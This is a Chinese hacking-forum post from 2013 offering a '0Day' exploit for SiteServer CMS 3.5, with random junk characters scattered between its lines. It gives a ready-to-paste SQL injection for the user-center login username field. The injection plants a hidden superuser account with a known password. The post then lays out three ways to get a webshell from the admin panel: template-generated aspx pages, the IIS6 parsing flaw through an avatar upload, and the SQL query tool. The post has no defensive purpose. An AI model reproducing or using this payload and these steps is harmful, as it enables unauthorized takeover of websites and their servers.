找回密码
 立即注册
查看: 2948|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版* h/ }6 T1 a' x1 H2 r, Q$ r
2 Z7 _4 y! ~- C* e# V. ~3 r
stieserver官网:www.siteserver.cn
0 d7 n  ]$ k: L& ~0 M) {% B
% z* ]/ I: r. @7 q+ ] ( B  {$ d. j( L3 \8 L5 `9 o# p4 ^9 U

5 w$ h: f9 B3 f" ?. ?& FEXP:
0 n5 A8 J' g5 D% C0 k. ]# _4 ]- I+ j
直接访问UserCenter/login.aspx6 _) s4 K! K2 q2 t" V

* k0 s+ X; z& S, C0 e, l
( Z: ~9 m( }; \7 T1 `* {% A
+ n% ?- W" u8 i" W用户名处输入:$ y  }( D4 h  m& @# m+ Q7 D4 v

0 r$ G# _: g$ Z8 W( e6 @123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
  n7 r7 D1 N7 ?. ?8 t
& p6 h1 `; R% ^. Q5 P( f  }0 f  j8 j + [; S8 U0 k) V/ ^% T  C
+ M! x. n( p2 f& d1 q6 f5 |
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
9 @' c! E' v, ^. x' |9 B0 X' N" u5 O" g! ~  T  C" o

' f- r  e! V; ~: i3 D6 j) s! [" N9 u0 L& P2 C
之后再访问后台SiteServer/login.aspx用插入的用户登陆7 ]! z0 U& z0 R' I/ e. S8 t
/ N& k: N) o3 i8 g2 G

0 t7 L* j5 i3 d7 i
' K% t2 I2 u9 J( N/ R. W后台拿webshell的三种方法:
, `) v3 P2 `4 h" G8 j% d5 D* e0 @8 y! V" i6 i3 \% K9 {0 [
一、% g) b# F" t( M" {

' e: h% _6 S+ p7 p/ j- Z. k站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx, g# ^6 z4 y- _$ {. L. l- O0 d
1 M1 U% |# ^* [' s5 m* i7 Y  f
二、
3 `/ p7 d2 ]" A2 n4 L- o. T( V5 h5 z* H  X
成员权限-》添加用户-》用户名为:1.asp$ A7 A6 V/ c3 r5 ~

; [& g- K5 @. P) l- T3 h$ Y$ Chttp://127.0.0.1/usercenter/: ?5 \- |) C8 |3 I
2 D: i$ Q  \  L& P+ i$ `+ k+ Z
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell: u$ O/ {7 z  g$ E/ P  f
) b' e8 j7 }% F& {$ @+ ^1 D
(ps:后台添加用户时不会验证是否含有非法字符)
" J+ M" t7 T2 C2 E2 r& ^- ?, c* \! V! ^) s
三、
, L5 u/ j- V% t6 }6 \8 g/ q' O0 }( p  }- u
系统工具-》实用工具-》机器参数查看2 I) d# ?+ _/ M; f" Y; ~) F% e
可以看到数据库类型、名称,WEB路径
: ~& ^; F- J9 Z* N1 Z; g" T* s1 C. u' [$ R* w" R) I5 Y
系统工具-》数据库工具-》SQL语句查询
' y: }! s8 j. m* \0 z! P( k这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。5 Z. s6 ~% B$ Y9 F. Q

2 H+ C+ D( `% t: H- D4 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表